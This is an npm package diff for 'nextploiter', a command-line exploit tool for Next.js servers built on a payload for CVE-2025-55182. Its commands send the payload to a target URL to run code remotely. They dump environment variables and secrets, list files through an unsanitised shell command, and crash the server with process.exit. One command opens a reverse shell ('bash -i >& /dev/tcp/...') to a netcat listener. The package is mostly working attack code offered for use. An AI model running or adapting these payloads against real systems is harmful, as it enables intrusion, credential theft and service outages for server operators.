nextploiter 0.0.0

package/README.md

@@ -0,0 +1,459 @@
+nextploiter
+=================
+
+Exploit tool for NextJS
+
+
+[![oclif](https://img.shields.io/badge/cli-oclif-brightgreen.svg)](https://oclif.io)
+[![Version](https://img.shields.io/npm/v/nextploiter.svg)](https://npmjs.org/package/nextploiter)
+[![Downloads/week](https://img.shields.io/npm/dw/nextploiter.svg)](https://npmjs.org/package/nextploiter)
+
+
+<!-- toc -->
+* [Usage](#usage)
+* [Commands](#commands)
+<!-- tocstop -->
+# Usage
+<!-- usage -->
+```sh-session
+$ npm install -g nextploiter
+$ nextploiter COMMAND
+running command...
+$ nextploiter (--version)
+nextploiter/0.0.0 darwin-arm64 node-v24.12.0
+$ nextploiter --help [COMMAND]
+USAGE
+  $ nextploiter COMMAND
+...
+```
+<!-- usagestop -->
+# Commands
+<!-- commands -->
+* [`nextploiter help [COMMAND]`](#nextploiter-help-command)
+* [`nextploiter plugins`](#nextploiter-plugins)
+* [`nextploiter plugins add PLUGIN`](#nextploiter-plugins-add-plugin)
+* [`nextploiter plugins:inspect PLUGIN...`](#nextploiter-pluginsinspect-plugin)
+* [`nextploiter plugins install PLUGIN`](#nextploiter-plugins-install-plugin)
+* [`nextploiter plugins link PATH`](#nextploiter-plugins-link-path)
+* [`nextploiter plugins remove [PLUGIN]`](#nextploiter-plugins-remove-plugin)
+* [`nextploiter plugins reset`](#nextploiter-plugins-reset)
+* [`nextploiter plugins uninstall [PLUGIN]`](#nextploiter-plugins-uninstall-plugin)
+* [`nextploiter plugins unlink [PLUGIN]`](#nextploiter-plugins-unlink-plugin)
+* [`nextploiter plugins update`](#nextploiter-plugins-update)
+* [`nextploiter rce`](#nextploiter-rce)
+* [`nextploiter rce access-files`](#nextploiter-rce-access-files)
+* [`nextploiter rce kill-server`](#nextploiter-rce-kill-server)
+* [`nextploiter rce list-env`](#nextploiter-rce-list-env)
+* [`nextploiter rce list-files`](#nextploiter-rce-list-files)
+* [`nextploiter rce spawn-terminal`](#nextploiter-rce-spawn-terminal)
+
+## `nextploiter help [COMMAND]`
+
+Display help for nextploiter.
+
+```
+USAGE
+  $ nextploiter help [COMMAND...] [-n]
+
+ARGUMENTS
+  [COMMAND...]  Command to show help for.
+
+FLAGS
+  -n, --nested-commands  Include all nested commands in the output.
+
+DESCRIPTION
+  Display help for nextploiter.
+```
+
+_See code: [@oclif/plugin-help](https://github.com/oclif/plugin-help/blob/v6.2.36/src/commands/help.ts)_
+
+## `nextploiter plugins`
+
+List installed plugins.
+
+```
+USAGE
+  $ nextploiter plugins [--json] [--core]
+
+FLAGS
+  --core  Show core plugins.
+
+GLOBAL FLAGS
+  --json  Format output as json.
+
+DESCRIPTION
+  List installed plugins.
+
+EXAMPLES
+  $ nextploiter plugins
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/index.ts)_
+
+## `nextploiter plugins add PLUGIN`
+
+Installs a plugin into nextploiter.
+
+```
+USAGE
+  $ nextploiter plugins add PLUGIN... [--json] [-f] [-h] [-s | -v]
+
+ARGUMENTS
+  PLUGIN...  Plugin to install.
+
+FLAGS
+  -f, --force    Force npm to fetch remote resources even if a local copy exists on disk.
+  -h, --help     Show CLI help.
+  -s, --silent   Silences npm output.
+  -v, --verbose  Show verbose npm output.
+
+GLOBAL FLAGS
+  --json  Format output as json.
+
+DESCRIPTION
+  Installs a plugin into nextploiter.
+
+  Uses npm to install plugins.
+
+  Installation of a user-installed plugin will override a core plugin.
+
+  Use the NEXTPLOITER_NPM_LOG_LEVEL environment variable to set the npm loglevel.
+  Use the NEXTPLOITER_NPM_REGISTRY environment variable to set the npm registry.
+
+ALIASES
+  $ nextploiter plugins add
+
+EXAMPLES
+  Install a plugin from npm registry.
+
+    $ nextploiter plugins add myplugin
+
+  Install a plugin from a github url.
+
+    $ nextploiter plugins add https://github.com/someuser/someplugin
+
+  Install a plugin from a github slug.
+
+    $ nextploiter plugins add someuser/someplugin
+```
+
+## `nextploiter plugins:inspect PLUGIN...`
+
+Displays installation properties of a plugin.
+
+```
+USAGE
+  $ nextploiter plugins inspect PLUGIN...
+
+ARGUMENTS
+  PLUGIN...  [default: .] Plugin to inspect.
+
+FLAGS
+  -h, --help     Show CLI help.
+  -v, --verbose
+
+GLOBAL FLAGS
+  --json  Format output as json.
+
+DESCRIPTION
+  Displays installation properties of a plugin.
+
+EXAMPLES
+  $ nextploiter plugins inspect myplugin
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/inspect.ts)_
+
+## `nextploiter plugins install PLUGIN`
+
+Installs a plugin into nextploiter.
+
+```
+USAGE
+  $ nextploiter plugins install PLUGIN... [--json] [-f] [-h] [-s | -v]
+
+ARGUMENTS
+  PLUGIN...  Plugin to install.
+
+FLAGS
+  -f, --force    Force npm to fetch remote resources even if a local copy exists on disk.
+  -h, --help     Show CLI help.
+  -s, --silent   Silences npm output.
+  -v, --verbose  Show verbose npm output.
+
+GLOBAL FLAGS
+  --json  Format output as json.
+
+DESCRIPTION
+  Installs a plugin into nextploiter.
+
+  Uses npm to install plugins.
+
+  Installation of a user-installed plugin will override a core plugin.
+
+  Use the NEXTPLOITER_NPM_LOG_LEVEL environment variable to set the npm loglevel.
+  Use the NEXTPLOITER_NPM_REGISTRY environment variable to set the npm registry.
+
+ALIASES
+  $ nextploiter plugins add
+
+EXAMPLES
+  Install a plugin from npm registry.
+
+    $ nextploiter plugins install myplugin
+
+  Install a plugin from a github url.
+
+    $ nextploiter plugins install https://github.com/someuser/someplugin
+
+  Install a plugin from a github slug.
+
+    $ nextploiter plugins install someuser/someplugin
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/install.ts)_
+
+## `nextploiter plugins link PATH`
+
+Links a plugin into the CLI for development.
+
+```
+USAGE
+  $ nextploiter plugins link PATH [-h] [--install] [-v]
+
+ARGUMENTS
+  PATH  [default: .] path to plugin
+
+FLAGS
+  -h, --help          Show CLI help.
+  -v, --verbose
+      --[no-]install  Install dependencies after linking the plugin.
+
+DESCRIPTION
+  Links a plugin into the CLI for development.
+
+  Installation of a linked plugin will override a user-installed or core plugin.
+
+  e.g. If you have a user-installed or core plugin that has a 'hello' command, installing a linked plugin with a 'hello'
+  command will override the user-installed or core plugin implementation. This is useful for development work.
+
+
+EXAMPLES
+  $ nextploiter plugins link myplugin
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/link.ts)_
+
+## `nextploiter plugins remove [PLUGIN]`
+
+Removes a plugin from the CLI.
+
+```
+USAGE
+  $ nextploiter plugins remove [PLUGIN...] [-h] [-v]
+
+ARGUMENTS
+  [PLUGIN...]  plugin to uninstall
+
+FLAGS
+  -h, --help     Show CLI help.
+  -v, --verbose
+
+DESCRIPTION
+  Removes a plugin from the CLI.
+
+ALIASES
+  $ nextploiter plugins unlink
+  $ nextploiter plugins remove
+
+EXAMPLES
+  $ nextploiter plugins remove myplugin
+```
+
+## `nextploiter plugins reset`
+
+Remove all user-installed and linked plugins.
+
+```
+USAGE
+  $ nextploiter plugins reset [--hard] [--reinstall]
+
+FLAGS
+  --hard       Delete node_modules and package manager related files in addition to uninstalling plugins.
+  --reinstall  Reinstall all plugins after uninstalling.
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/reset.ts)_
+
+## `nextploiter plugins uninstall [PLUGIN]`
+
+Removes a plugin from the CLI.
+
+```
+USAGE
+  $ nextploiter plugins uninstall [PLUGIN...] [-h] [-v]
+
+ARGUMENTS
+  [PLUGIN...]  plugin to uninstall
+
+FLAGS
+  -h, --help     Show CLI help.
+  -v, --verbose
+
+DESCRIPTION
+  Removes a plugin from the CLI.
+
+ALIASES
+  $ nextploiter plugins unlink
+  $ nextploiter plugins remove
+
+EXAMPLES
+  $ nextploiter plugins uninstall myplugin
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/uninstall.ts)_
+
+## `nextploiter plugins unlink [PLUGIN]`
+
+Removes a plugin from the CLI.
+
+```
+USAGE
+  $ nextploiter plugins unlink [PLUGIN...] [-h] [-v]
+
+ARGUMENTS
+  [PLUGIN...]  plugin to uninstall
+
+FLAGS
+  -h, --help     Show CLI help.
+  -v, --verbose
+
+DESCRIPTION
+  Removes a plugin from the CLI.
+
+ALIASES
+  $ nextploiter plugins unlink
+  $ nextploiter plugins remove
+
+EXAMPLES
+  $ nextploiter plugins unlink myplugin
+```
+
+## `nextploiter plugins update`
+
+Update installed plugins.
+
+```
+USAGE
+  $ nextploiter plugins update [-h] [-v]
+
+FLAGS
+  -h, --help     Show CLI help.
+  -v, --verbose
+
+DESCRIPTION
+  Update installed plugins.
+```
+
+_See code: [@oclif/plugin-plugins](https://github.com/oclif/plugin-plugins/blob/v5.4.54/src/commands/plugins/update.ts)_
+
+## `nextploiter rce`
+
+Used for running javascript code at the remote server.
+
+```
+USAGE
+  $ nextploiter rce
+
+DESCRIPTION
+  Used for running javascript code at the remote server.
+```
+
+_See code: [src/commands/rce/index.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/index.ts)_
+
+## `nextploiter rce access-files`
+
+Helper to list return files in the server. May not work for serverless systems.
+
+```
+USAGE
+  $ nextploiter rce access-files --baseURL <value>
+
+FLAGS
+  --baseURL=<value>  (required)
+
+DESCRIPTION
+  Helper to list return files in the server. May not work for serverless systems.
+```
+
+_See code: [src/commands/rce/access-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/access-files.ts)_
+
+## `nextploiter rce kill-server`
+
+Helper that uses process.exit to shutdown remote server.
+
+```
+USAGE
+  $ nextploiter rce kill-server --baseURL <value>
+
+FLAGS
+  --baseURL=<value>  (required)
+
+DESCRIPTION
+  Helper that uses process.exit to shutdown remote server.
+```
+
+_See code: [src/commands/rce/kill-server.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/kill-server.ts)_
+
+## `nextploiter rce list-env`
+
+Helper that iterates through process.env to scrape all environment variables.
+
+```
+USAGE
+  $ nextploiter rce list-env --baseURL <value>
+
+FLAGS
+  --baseURL=<value>  (required)
+
+DESCRIPTION
+  Helper that iterates through process.env to scrape all environment variables.
+```
+
+_See code: [src/commands/rce/list-env.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/list-env.ts)_
+
+## `nextploiter rce list-files`
+
+Helper to list all files in the server. May not work for serverless systems.
+
+```
+USAGE
+  $ nextploiter rce list-files --baseURL <value> [--dir <value>]
+
+FLAGS
+  --baseURL=<value>  (required) Base URL of server to attack
+  --dir=<value>      [default: .] Directory for ls command
+
+DESCRIPTION
+  Helper to list all files in the server. May not work for serverless systems.
+```
+
+_See code: [src/commands/rce/list-files.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/list-files.ts)_
+
+## `nextploiter rce spawn-terminal`
+
+Helper that spawns a terminal.
+
+```
+USAGE
+  $ nextploiter rce spawn-terminal --baseURL <value>
+
+FLAGS
+  --baseURL=<value>  (required)
+
+DESCRIPTION
+  Helper that spawns a terminal.
+```
+
+_See code: [src/commands/rce/spawn-terminal.ts](https://github.com/vonuyvicoo/nextploiter/blob/v0.0.0/src/commands/rce/spawn-terminal.ts)_
+<!-- commandsstop -->

package/bin/dev.cmd

@@ -0,0 +1,3 @@
+@echo off
+
+node "%~dp0\dev" %*

package/bin/dev.js

@@ -0,0 +1,7 @@
+#!/usr/bin/env node_modules/.bin/ts-node
+
+// eslint-disable-next-line unicorn/prefer-top-level-await
+;(async () => {
+  const oclif = await import('@oclif/core')
+  await oclif.execute({development: true, dir: __dirname})
+})()

package/bin/run.cmd

@@ -0,0 +1,3 @@
+@echo off
+
+node "%~dp0\run" %*

package/bin/run.js

@@ -0,0 +1,7 @@
+#!/usr/bin/env node
+
+// eslint-disable-next-line unicorn/prefer-top-level-await
+(async () => {
+  const oclif = await import('@oclif/core')
+  await oclif.execute({dir: __dirname})
+})()

package/dist/_shared/helpers/digestParser.d.ts

@@ -0,0 +1 @@
+export declare function parseFlightDigest(input: string): string | null;

package/dist/_shared/helpers/digestParser.js

@@ -0,0 +1,19 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.parseFlightDigest = parseFlightDigest;
+function parseFlightDigest(input) {
+    for (const line of input.split(/\r?\n/)) {
+        const i = line.indexOf(':');
+        if (i === -1)
+            continue;
+        const payload = line.slice(i + 1);
+        if (!payload.startsWith('E{'))
+            continue;
+        try {
+            const err = JSON.parse(payload.slice(1));
+            return err.digest ?? null;
+        }
+        catch { }
+    }
+    return null;
+}

package/dist/_shared/helpers/openTerminal.d.ts

@@ -0,0 +1 @@
+export declare function openTerminal(cmd: string): void;

package/dist/_shared/helpers/openTerminal.js

@@ -0,0 +1,35 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.openTerminal = openTerminal;
+const node_child_process_1 = require("node:child_process");
+function openTerminal(cmd) {
+    const platform = process.platform;
+    if (platform === "darwin") {
+        // terminal macos
+        (0, node_child_process_1.execSync)(`osascript -e 'tell application "Terminal" to do script "${cmd.replace(/"/g, '\\"')}"'`);
+        return;
+    }
+    if (platform === "win32") {
+        // windows cmd
+        (0, node_child_process_1.execSync)(`start cmd.exe /k ${cmd}`, { shell: "cmd.exe" });
+        return;
+    }
+    //linux brute force
+    const terminals = [
+        `x-terminal-emulator -e "bash -c '${cmd}; exec bash'"`,
+        `gnome-terminal -- bash -c "${cmd}; exec bash"`,
+        `konsole -e bash -c "${cmd}; exec bash"`,
+        `xfce4-terminal -e "${cmd}"`,
+        `xterm -e "${cmd}"`,
+    ];
+    for (const t of terminals) {
+        try {
+            (0, node_child_process_1.execSync)(t, { stdio: "ignore" });
+            return; // success
+        }
+        catch {
+            // try next terminal
+        }
+    }
+    throw new Error("No supported terminal emulator found");
+}

package/dist/base/nextploiter-command.d.ts

@@ -0,0 +1,11 @@
+import { Command } from "@oclif/core";
+export interface INextploiterCommandItem {
+    name: string;
+    value: string;
+}
+export interface INextploiterCommandOptions {
+    color?: string;
+}
+export declare abstract class NextploiterCommand extends Command {
+    logSection(name: string, items: INextploiterCommandItem[], options?: INextploiterCommandOptions): void;
+}

package/dist/base/nextploiter-command.js

@@ -0,0 +1,16 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.NextploiterCommand = void 0;
+const core_1 = require("@oclif/core");
+class NextploiterCommand extends core_1.Command {
+    logSection(name, items, options) {
+        let logString = "";
+        logString += `---------------------- [${name}] ---------------------------\n`;
+        items.forEach((item) => {
+            logString += `${item.name}: ${item.value} \n`;
+        });
+        logString += `-------------------------------------------------------------\n`;
+        super.log(logString);
+    }
+}
+exports.NextploiterCommand = NextploiterCommand;

package/dist/commands/rce/access-files.d.ts

@@ -0,0 +1,8 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+export default class AccessFiles extends NextploiterCommand {
+    static description: string;
+    static flags: {
+        baseURL: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+    };
+    run(): Promise<void>;
+}

package/dist/commands/rce/access-files.js

@@ -0,0 +1,51 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const core_1 = require("@oclif/core");
+const payloads_1 = require("../../payloads");
+const form_data_1 = __importDefault(require("form-data"));
+const node_fetch_1 = __importDefault(require("node-fetch"));
+const digestParser_1 = require("../../_shared/helpers/digestParser");
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+class AccessFiles extends nextploiter_command_1.NextploiterCommand {
+    static description = "Helper to list return files in the server. May not work for serverless systems.";
+    static flags = {
+        baseURL: core_1.Flags.string({
+            required: true
+        })
+    };
+    async run() {
+        const { flags } = await this.parse(AccessFiles);
+        const payload = (0, payloads_1.payloadBuilder)(`var res = "";for (const key of Object.keys(process.env)) {res += (key + "<sep> " + process.env[key] + "\\n" );};`);
+        const fd = new form_data_1.default();
+        this.log("Sending payload: ", payload);
+        for (const key in payload) {
+            fd.append(key, JSON.stringify(payload[key]));
+        }
+        const response = await (0, node_fetch_1.default)(flags.baseURL, {
+            method: "POST",
+            headers: {
+                'next-action': 'x',
+                ...fd.getHeaders()
+            },
+            body: fd.getBuffer(),
+        });
+        const responseText = await response.text();
+        const parsedDigest = (0, digestParser_1.parseFlightDigest)(responseText);
+        if (!parsedDigest)
+            throw new Error("No digest found.");
+        const parsedItems = parsedDigest.split("\n").map((line) => {
+            const envItems = line.split("<sep>");
+            const envKey = envItems[0];
+            const envValue = envItems[1];
+            return {
+                name: envKey,
+                value: envValue
+            };
+        });
+        this.logSection("Environment Variables", parsedItems);
+    }
+}
+exports.default = AccessFiles;

package/dist/commands/rce/index.d.ts

@@ -0,0 +1,5 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+export default class RCE extends NextploiterCommand {
+    static description: string;
+    run(): Promise<void>;
+}

package/dist/commands/rce/index.js

@@ -0,0 +1,11 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+class RCE extends nextploiter_command_1.NextploiterCommand {
+    static description = "Used for running javascript code at the remote server.";
+    async run() {
+        this.log("Please select a sub-command.");
+        this.exit(1);
+    }
+}
+exports.default = RCE;

package/dist/commands/rce/kill-server.d.ts

@@ -0,0 +1,10 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+import { CommandError } from "@oclif/core/lib/interfaces";
+export default class KillServer extends NextploiterCommand {
+    static description: string;
+    static flags: {
+        baseURL: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+    };
+    run(): Promise<void>;
+    catch(err: CommandError): Promise<void>;
+}

package/dist/commands/rce/kill-server.js

@@ -0,0 +1,47 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const core_1 = require("@oclif/core");
+const payloads_1 = require("../../payloads");
+const form_data_1 = __importDefault(require("form-data"));
+const node_fetch_1 = __importDefault(require("node-fetch"));
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+class KillServer extends nextploiter_command_1.NextploiterCommand {
+    static description = "Helper that uses process.exit to shutdown remote server.";
+    static flags = {
+        baseURL: core_1.Flags.string({
+            required: true
+        })
+    };
+    async run() {
+        const { flags } = await this.parse(KillServer);
+        const payload = (0, payloads_1.payloadBuilder)(`process.exit(0);`);
+        const fd = new form_data_1.default();
+        this.log("Sending payload: ", payload);
+        for (const key in payload) {
+            fd.append(key, JSON.stringify(payload[key]));
+        }
+        const response = await (0, node_fetch_1.default)(flags.baseURL, {
+            method: "POST",
+            headers: {
+                'next-action': 'x',
+                ...fd.getHeaders()
+            },
+            body: fd.getBuffer(),
+        });
+        if (!response.ok) {
+            this.log(response.statusText);
+        }
+    }
+    async catch(err) {
+        if (err.message.includes("socket hang up")) {
+            this.log("Server shut down successfully.");
+        }
+        else {
+            this.log("Server is not vulnerable to CVE-2025-55182.");
+        }
+    }
+}
+exports.default = KillServer;

package/dist/commands/rce/list-env.d.ts

@@ -0,0 +1,8 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+export default class ListEnv extends NextploiterCommand {
+    static description: string;
+    static flags: {
+        baseURL: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+    };
+    run(): Promise<void>;
+}

package/dist/commands/rce/list-env.js

@@ -0,0 +1,51 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const core_1 = require("@oclif/core");
+const payloads_1 = require("../../payloads");
+const form_data_1 = __importDefault(require("form-data"));
+const node_fetch_1 = __importDefault(require("node-fetch"));
+const digestParser_1 = require("../../_shared/helpers/digestParser");
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+class ListEnv extends nextploiter_command_1.NextploiterCommand {
+    static description = "Helper that iterates through process.env to scrape all environment variables.";
+    static flags = {
+        baseURL: core_1.Flags.string({
+            required: true
+        })
+    };
+    async run() {
+        const { flags } = await this.parse(ListEnv);
+        const payload = (0, payloads_1.payloadBuilder)(`var res = "";for (const key of Object.keys(process.env)) {res += (key + "<sep> " + process.env[key] + "\\n" );};`);
+        const fd = new form_data_1.default();
+        this.log("Sending payload: ", payload);
+        for (const key in payload) {
+            fd.append(key, JSON.stringify(payload[key]));
+        }
+        const response = await (0, node_fetch_1.default)(flags.baseURL, {
+            method: "POST",
+            headers: {
+                'next-action': 'x',
+                ...fd.getHeaders()
+            },
+            body: fd.getBuffer(),
+        });
+        const responseText = await response.text();
+        const parsedDigest = (0, digestParser_1.parseFlightDigest)(responseText);
+        if (!parsedDigest)
+            throw new Error("No digest found.");
+        const parsedItems = parsedDigest.split("\n").map((line) => {
+            const envItems = line.split("<sep>");
+            const envKey = envItems[0];
+            const envValue = envItems[1];
+            return {
+                name: envKey,
+                value: envValue
+            };
+        });
+        this.logSection("Environment Variables", parsedItems);
+    }
+}
+exports.default = ListEnv;

package/dist/commands/rce/list-files.d.ts

@@ -0,0 +1,9 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+export default class ListFiles extends NextploiterCommand {
+    static description: string;
+    static flags: {
+        baseURL: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+        dir: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+    };
+    run(): Promise<void>;
+}

package/dist/commands/rce/list-files.js

@@ -0,0 +1,53 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const core_1 = require("@oclif/core");
+const payloads_1 = require("../../payloads");
+const form_data_1 = __importDefault(require("form-data"));
+const node_fetch_1 = __importDefault(require("node-fetch"));
+const digestParser_1 = require("../../_shared/helpers/digestParser");
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+class ListFiles extends nextploiter_command_1.NextploiterCommand {
+    static description = "Helper to list all files in the server. May not work for serverless systems.";
+    static flags = {
+        baseURL: core_1.Flags.string({
+            required: true,
+            description: "Base URL of server to attack"
+        }),
+        dir: core_1.Flags.string({
+            default: ".",
+            description: "Directory for ls command"
+        })
+    };
+    async run() {
+        const { flags } = await this.parse(ListFiles);
+        const payload = (0, payloads_1.payloadBuilder)(`const {execSync} = process.mainModule.require("child_process"); var res = execSync("ls ${flags.dir}").toString();`);
+        const fd = new form_data_1.default();
+        this.log("Sending payload: ", payload);
+        for (const key in payload) {
+            fd.append(key, JSON.stringify(payload[key]));
+        }
+        const response = await (0, node_fetch_1.default)(flags.baseURL, {
+            method: "POST",
+            headers: {
+                'next-action': 'x',
+                ...fd.getHeaders()
+            },
+            body: fd.getBuffer(),
+        });
+        const responseText = await response.text();
+        const parsedDigest = (0, digestParser_1.parseFlightDigest)(responseText);
+        if (!parsedDigest)
+            throw new Error("No digest found.");
+        const parsedItems = parsedDigest.split("\n").map((line) => {
+            return {
+                name: "File: ",
+                value: line
+            };
+        });
+        this.logSection("Files Found", parsedItems);
+    }
+}
+exports.default = ListFiles;

package/dist/commands/rce/spawn-terminal.d.ts

@@ -0,0 +1,8 @@
+import { NextploiterCommand } from "../../base/nextploiter-command";
+export default class ListEnv extends NextploiterCommand {
+    static description: string;
+    static flags: {
+        baseURL: import("@oclif/core/lib/interfaces").OptionFlag<string, import("@oclif/core/lib/interfaces").CustomOptions>;
+    };
+    run(): Promise<void>;
+}

package/dist/commands/rce/spawn-terminal.js

@@ -0,0 +1,60 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const core_1 = require("@oclif/core");
+const payloads_1 = require("../../payloads");
+const form_data_1 = __importDefault(require("form-data"));
+const node_fetch_1 = __importDefault(require("node-fetch"));
+const digestParser_1 = require("../../_shared/helpers/digestParser");
+const nextploiter_command_1 = require("../../base/nextploiter-command");
+const openTerminal_1 = require("../../_shared/helpers/openTerminal");
+class ListEnv extends nextploiter_command_1.NextploiterCommand {
+    static description = "Helper that spawns a terminal.";
+    static flags = {
+        baseURL: core_1.Flags.string({
+            required: true
+        })
+    };
+    /*
+        async establishProxy(){
+            const proxy = proxy.createProxy()
+    
+            return proxy;
+        }
+    */
+    async run() {
+        const { flags } = await this.parse(ListEnv);
+        const payload = (0, payloads_1.payloadBuilder)(`var res = "Successfully connected."; process.mainModule.require("child_process").execSync("bash -i >& /dev/tcp/127.0.0.1/4444 0>&1");`);
+        const fd = new form_data_1.default();
+        this.log("Opening terminal in new window..");
+        (0, openTerminal_1.openTerminal)("nc -l 4444");
+        this.log("Waiting 4 seconds to finish...");
+        await new Promise((r) => setTimeout(r, 4000));
+        this.log("Sending payload: ", payload);
+        for (const key in payload) {
+            fd.append(key, JSON.stringify(payload[key]));
+        }
+        const response = await (0, node_fetch_1.default)(flags.baseURL, {
+            method: "POST",
+            headers: {
+                'next-action': 'x',
+                ...fd.getHeaders()
+            },
+            body: fd.getBuffer(),
+        });
+        const responseText = await response.text();
+        const parsedDigest = (0, digestParser_1.parseFlightDigest)(responseText);
+        if (!parsedDigest)
+            throw new Error("No digest found.");
+        const parsedItems = parsedDigest.split("\n").map((line) => {
+            return {
+                name: "message",
+                value: line
+            };
+        });
+        this.logSection("Terminal Spawn Status", parsedItems);
+    }
+}
+exports.default = ListEnv;

package/dist/index.d.ts

@@ -0,0 +1 @@
+export { run } from '@oclif/core';

package/dist/index.js

@@ -0,0 +1,4 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+var core_1 = require("@oclif/core");
+Object.defineProperty(exports, "run", { enumerable: true, get: function () { return core_1.run; } });

package/dist/payloads/CVE-2025-55182/payload.d.ts

@@ -0,0 +1,4 @@
+/**
+ * You should declare a res variable in the code string and make sure it resolves to a string
+ */
+export declare const payloadBuilder: (code: string) => Record<string, unknown>;

package/dist/payloads/CVE-2025-55182/payload.js

@@ -0,0 +1,27 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.payloadBuilder = void 0;
+/**
+ * You should declare a res variable in the code string and make sure it resolves to a string
+ */
+const payloadBuilder = function (code) {
+    // From https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478
+    return {
+        '0': {
+            "then": "$1:__proto__:then",
+            "status": "resolved_model",
+            "reason": -1,
+            "value": "{\"then\":\"$B1337\"}",
+            "_response": {
+                "_prefix": code + ";;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
+                "_chunks": "$Q2",
+                "_formData": {
+                    "get": "$1:constructor:constructor"
+                }
+            }
+        },
+        '1': "$@0",
+        '2': []
+    };
+};
+exports.payloadBuilder = payloadBuilder;

package/dist/payloads/index.d.ts

@@ -0,0 +1 @@
+export * from "./CVE-2025-55182/payload";

package/dist/payloads/index.js

@@ -0,0 +1,17 @@
+"use strict";
+var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    var desc = Object.getOwnPropertyDescriptor(m, k);
+    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
+      desc = { enumerable: true, get: function() { return m[k]; } };
+    }
+    Object.defineProperty(o, k2, desc);
+}) : (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    o[k2] = m[k];
+}));
+var __exportStar = (this && this.__exportStar) || function(m, exports) {
+    for (var p in m) if (p !== "default" && !Object.prototype.hasOwnProperty.call(exports, p)) __createBinding(exports, m, p);
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+__exportStar(require("./CVE-2025-55182/payload"), exports);

package/oclif.manifest.json

@@ -0,0 +1,174 @@
+{
+  "commands": {
+    "rce:access-files": {
+      "aliases": [],
+      "args": {},
+      "description": "Helper to list return files in the server. May not work for serverless systems.",
+      "flags": {
+        "baseURL": {
+          "name": "baseURL",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        }
+      },
+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce:access-files",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "access-files.js"
+      ]
+    },
+    "rce": {
+      "aliases": [],
+      "args": {},
+      "description": "Used for running javascript code at the remote server.",
+      "flags": {},
+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "index.js"
+      ]
+    },
+    "rce:kill-server": {
+      "aliases": [],
+      "args": {},
+      "description": "Helper that uses process.exit to shutdown remote server.",
+      "flags": {
+        "baseURL": {
+          "name": "baseURL",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        }
+      },
